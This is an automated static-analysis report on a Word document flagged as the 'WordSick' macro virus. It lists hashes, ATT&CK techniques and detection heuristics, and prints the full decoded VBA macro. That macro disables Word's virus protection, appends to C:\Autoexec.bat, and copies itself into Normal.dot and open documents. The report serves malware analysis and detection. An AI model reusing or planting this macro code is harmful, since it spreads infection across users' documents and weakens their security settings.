Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bcda25f5d0e2d7af…

MALICIOUS

Office (OLE)

27.5 KB Created: 2000-05-17 22:41:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 4841905eccae2bc98ff0e15fe638af97 SHA-1: d982319465292491ee3cf9dcb0b268685f8f490c SHA-256: bcda25f5d0e2d7afc8a4b9203a2c1927abeb3df37553c8a02813be0f3c3623ad
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA macro with an AutoClose subroutine, which is a common technique for executing malicious code when a document is closed. The script attempts to append 'ECHO Help Me Im Sick' to C:\Autoexec.bat, potentially modifying system startup behavior. It also attempts to infect the Normal.dot template and the active document with its macro, and exports itself to 'c:\WordSick.drv'.

Heuristics 4

  • ClamAV: Doc.Trojan.Fool-11 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Fool-11
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1542 bytes
SHA-256: b1668b9a45d380d008c75d49d760fb2e10c6b43661ed4b6a70c1d1a11df43d26
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WordSick"

Sub AutoClose()
    'WordSick Virus v1.00
    'The WaLRuS 05/00
    On Error Resume Next
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    ActiveDocument.ReadOnlyRecommended = False
    SetAttr "C:\Autoexec.bat", 0
    Open "C:\Autoexec.bat" For Append As #1
    Print #1, "ECHO                    Help Me Im Sick     "
    Close #1
Finish:
If (Second(Now()) > 50) Then Call HelpCall
    Set Norm = NormalTemplate.VBProject.VBComponents
    Set Doc = ActiveDocument.VBProject.VBComponents
If Norm.Item("WordSick").Name <> "WordSick" Then
    Doc("WordSick").Export "c:\WordSick.drv"
    Set infect = NormalTemplate.VBProject
ElseIf Doc.Item("WordSick").Name <> "WordSick" Then
    Norm("WordSick").Export "c:\WordSick.drv"
    Set infect = ActiveDocument.VBProject
End If
infect.VBComponents.Import ("c:\WordSick.drv")
ActiveDocument.Save
End Sub

Sub HelpCall()
    On Error Resume Next
    MsgBox "Please Help Me Im Sick", vbInformation
    Assistant.Visible = True
    With Assistant.NewBalloon
    .Icon = msoIconAlert
    .Text = "Please Help Me Im Sick"
    .Heading = "HELP"
    .Show
    End With
End Sub